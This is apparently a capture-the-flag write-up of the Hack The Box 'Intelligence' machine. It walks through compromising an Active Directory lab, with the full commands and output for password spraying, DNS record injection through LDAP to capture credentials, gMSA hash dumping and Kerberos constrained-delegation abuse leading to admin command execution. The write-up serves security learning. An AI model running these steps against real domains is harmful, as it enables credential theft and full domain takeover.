User:
At first let’s check what ports are available:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-04 02:22:39Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-04T02:24:09+00:00; +7h00m02s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-04T02:24:08+00:00; +7h00m02s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-04T02:24:09+00:00; +7h00m02s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-04T02:24:08+00:00; +7h00m02s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
49700/tcp open msrpc Microsoft Windows RPC
56490/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m01s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-07-04T02:23:30
|_ start_date: N/A
It looks like an active directory, but before anything else let’s check the website:
There is a link to two PDFs (/documents/2020-01-01-upload.pdf
and http://intelligence.htb/documents/2020-12-15-upload.pdf
).
They don’t have nothing useful, just lorem ipsum text. What looks suspicious is the name format, it’s “date-upload.pdf” so used Burp intruder to check for more valid pdfs, this is the payload:
After the intruder finished filtered non 200 responses,and saved the result table (only including the payload) to a file so I can use the wordlist to download all the pdfs:
for i in $(cat wordlists); do wget "http://intelligence.htb:8000/$i-upload.pdf"; done
There are two PDFs without lorem ipsum text in them:
New Account Guide (/documents/2020-06-04-upload.pdf
):
Internal IT Update (/documents/2020-12-30-upload.pdf
):
We have a password but we don’t have users yet so we get the users from pdfs meteadata:
exiftool pdfs/* | grep Creator | awk '{ print $3}' | sort -u
Finally we can check the valid user and password with password spraying and kerbrute:
kerbrute passwordspray --dc dc.intelligence.htb -d intelligence.htb authors.txt NewIntelligenceCorpUser9876
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 07/05/21 - Ronnie Flathers @ropnop
2021/07/05 07:47:26 > Using KDC(s):
2021/07/05 07:47:26 > dc.intelligence.htb:88
2021/07/05 07:47:26 > [+] VALID LOGIN: Tiffany.Molina@intelligence.htb:NewIntelligenceCorpUser9876
2021/07/05 07:47:26 > Done! Tested 30 logins (1 successes) in 0.426 seconds
At this point we can test multiple services with this password:
- SMB
- WinRM
- LDAP
SMB worked just fine and found the user flag in it,we can grab it with the following command:
smbclient -E -U Tiffany.Molina%NewIntelligenceCorpUser9876 //10.10.10.248/Users -c 'get \\Tiffany.Molina\\Desktop\\user.txt /dev/fd/1' 2>/dev/null | cat
Root
Additionally there is the following file in the IT
share from SMB:
|
|
So if we manage to inject a subdomain to intelligence.htb
and point it to ourself we can get the credentials of Ted.Graves.
To edit it I found this command dnscmd
. However we aren’t allowed to get a shell throguh EvilWinRM. After some time investigating and a nudge found this post and they mention a tool that among other functionalities allow us to create dns records using ldap:
python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p NewIntelligenceCorpUser9876 -a add -r websample.intelligence.htb -d 10.10.15.193 10.10.10.248
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
/home/jusepe/Documents/HackTheBox/Machines/Intelligence/krbrelayx/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead
res = dnsresolver.query(zone, 'SOA')
[-] Adding new record
[+] LDAP operation completed successfully
At this point made an attempt to get the credentials with netcat:
nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.15.193] from (UNKNOWN) [10.10.10.248] 64132
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1852
Host: websample
Connection: Keep-Alive
For some reason it didn’t catch the kerberos credentials, and tried out with responder
:
Cracked the password with hashcat and rockyou:
Now from the previous pdf we know that service accounts are active so found if that was exploitable, and found this two resources of how to attack kerberos constrained delegation:
As the posts explain “Attribute msds-allowedtodelegateto identifies the SPNs of services the user spot is trusted to delegate to”. So used ldap to enumerate the account that we can delegate to:
ldapsearch -h 10.10.10.248 -b "dc=intelligence,dc=htb" -D "Ted.Graves@intelligence.htb" -w "Mr.Teddy" | grep msDS-AllowedToDelegateTo
msDS-AllowedToDelegateTo: WWW/dc.intelligence.htb
Now we get the NTHashes using gMSADumper:
python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
svc_int$:::d64b83fe606e6d3005e20ce0ee932fe2
That hash can be used to request a kerberos ticket:
impacket-getST intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator
Impacket v0.9.24.dev1+20210706.140217.6da655ca - Copyright 2021 SecureAuth Corporation
[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great
Before continuing we need to sync:
sudo net time set -S intelligence.htb
We export the ticket:
export KRB5CCNAME=Administrator.ccache
Finally we can execute commands as administrator using the kerberos ticket:
impacket-atexec -k -no-pass dc.intelligence.htb 'whoami && ipconfig'
Impacket v0.9.24.dev1+20210706.140217.6da655ca - Copyright 2021 SecureAuth Corporation
[!] This will work ONLY on Windows >= Vista
[*] Creating task \tfiHspSg
[*] Running task \tfiHspSg
[*] Deleting task \tfiHspSg
[*] Attempting to read ADMIN$\Temp\tfiHspSg.tmp
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::9473:360f:c80a:40d3
Link-local IPv6 Address . . . . . : fe80::9473:360f:c80a:40d3%6
IPv4 Address. . . . . . . . . . . : 10.10.10.248
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:30b0%6
10.10.10.2